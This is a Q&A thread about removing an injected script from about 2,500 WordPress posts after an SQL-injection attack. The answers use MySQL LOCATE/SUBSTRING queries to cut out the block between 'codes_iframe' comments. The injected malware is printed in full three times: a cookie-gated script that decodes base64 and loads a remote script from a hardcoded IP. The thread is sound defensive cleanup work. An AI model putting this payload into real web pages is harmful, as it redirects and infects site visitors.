How to remove scripts in posts from an sql injection attack?

Question

I had a plugin that made my Wordpress site vulnerable to SQL injection attack. I've since locked down my site and removed all Wordpress files then reinstalled Wordpress. The plugin has also since been removed. Unfortunately I now have all 2503 posts with the following example script installed:

<!--codes_iframe-->
<script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script>
<!--/codes_iframe-->

The problem is, when I search for the particular script the base64 string is different for every post. So I can't just do a find and replace/remove.

My thought was, since the beginning and ending of the script is actually commented, couldn't a database query somehow remove the code between them then a second query remove the comments? If so I can't find this anywhere. It seems easy to do, but apparently (according to Google) it's quite complicated.

Hopefully someone will have a procedural remedy. In the meantime, I'll be doing this removal manually with the hopes that someone can save me some time.

Answer 1

MySQL 8.0 introduces a new function REGEXP_REPLACE() but if you are using an earlier version of MySQL, you could use LOCATE() to find the start and end position in the text, and then chop out the content between those two positions.

I tested this out — I created a table wp_mytable and put your offending text into it, with a bit of text before and after.

mysql> select * from wp_mytable\G
*************************** 1. row ***************************
 id: 1
txt: ABC 123
<!--codes_iframe-->
<script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]\/+^])/g,"\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"></script>')} </script>
<!--/codes_iframe-->
And that's all, folks.
1 row in set (0.00 sec)

LOCATE() can find the open and close tags:

mysql> SELECT LOCATE('<!--codes_iframe-->', txt) as start from wp_mytable;
+-------+
| start |
+-------+
|     9 |
+-------+

mysql> SELECT LOCATE('<!--/codes_iframe-->', txt) as end from wp_mytable;
+------+
| end  |
+------+
|  830 |
+------+

Now if we replace txt with the content before position 9, and after position 830+LENGTH('<!--/codes_iframe-->'), that will remove the problem content.

Test it out first with SELECT:

mysql> SELECT 
  SUBSTRING(txt, 1, LOCATE('<!--codes_iframe-->', txt)-1) AS pre_txt,
  SUBSTRING(txt, LOCATE('<!--/codes_iframe-->', txt)+LENGTH('<!--/codes_iframe-->')) AS post_txt 
  FROM wp_mytable\G
*************************** 1. row ***************************
 pre_txt: ABC 123

post_txt: 
And that's all, folks.

When we're confident that's the right substring, concatenate the pieces together and use them in an UPDATE:

mysql> UPDATE wp_mytable SET txt = CONCAT(
  SUBSTRING(txt, 1, LOCATE('<!--codes_iframe-->', txt)-1),
  SUBSTRING(txt, LOCATE('<!--/codes_iframe-->', txt)+LENGTH('<!--/codes_iframe-->')))
  WHERE LOCATE('<!--codes_iframe-->', txt) > 0;

As always, make a backup of your data before attempting this type of surgery.

It also occurs to me that you should search the data again after you've done this replacement, in case the offending script was inserted twice within a given text. The replacement method only removes the first occurrence, but you want that. You wouldn't want to remove the legitimate text in between two occurrences of the script.

By the way, I'm sorry to hear you got hacked with an SQL injection attack. People suck sometimes.

Answer 2

Just wanted to add to this thread as I found it helpful but with a bit of difference from the posted answer.

The main thing is that the attack in my wordpress database was tacked onto the end of many, many, many wp_posts. So, I didn't need to reattach two strings, just trim from the end.

Not sure this is the best version, but here's what worked for me (after testing it out with SELECT) and cleared nearly 3,000 posts of the offending code doing so:

UPDATE wp_posts SET post_content =
 SUBSTRING(post_content, 1, LOCATE('<!--codes_iframe-->', post_content)-1)
 WHERE LOCATE('<!--codes_iframe-->', post_content) >0;

Thanks for the help in keeping my site finally cleared!

Answer 3

You can try using function replace this has most confiable:

UPDATE wp_posts SET post_content = replace(post_content, '<!--codes_iframe-->
<script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script>
<!--/codes_iframe-->',
'');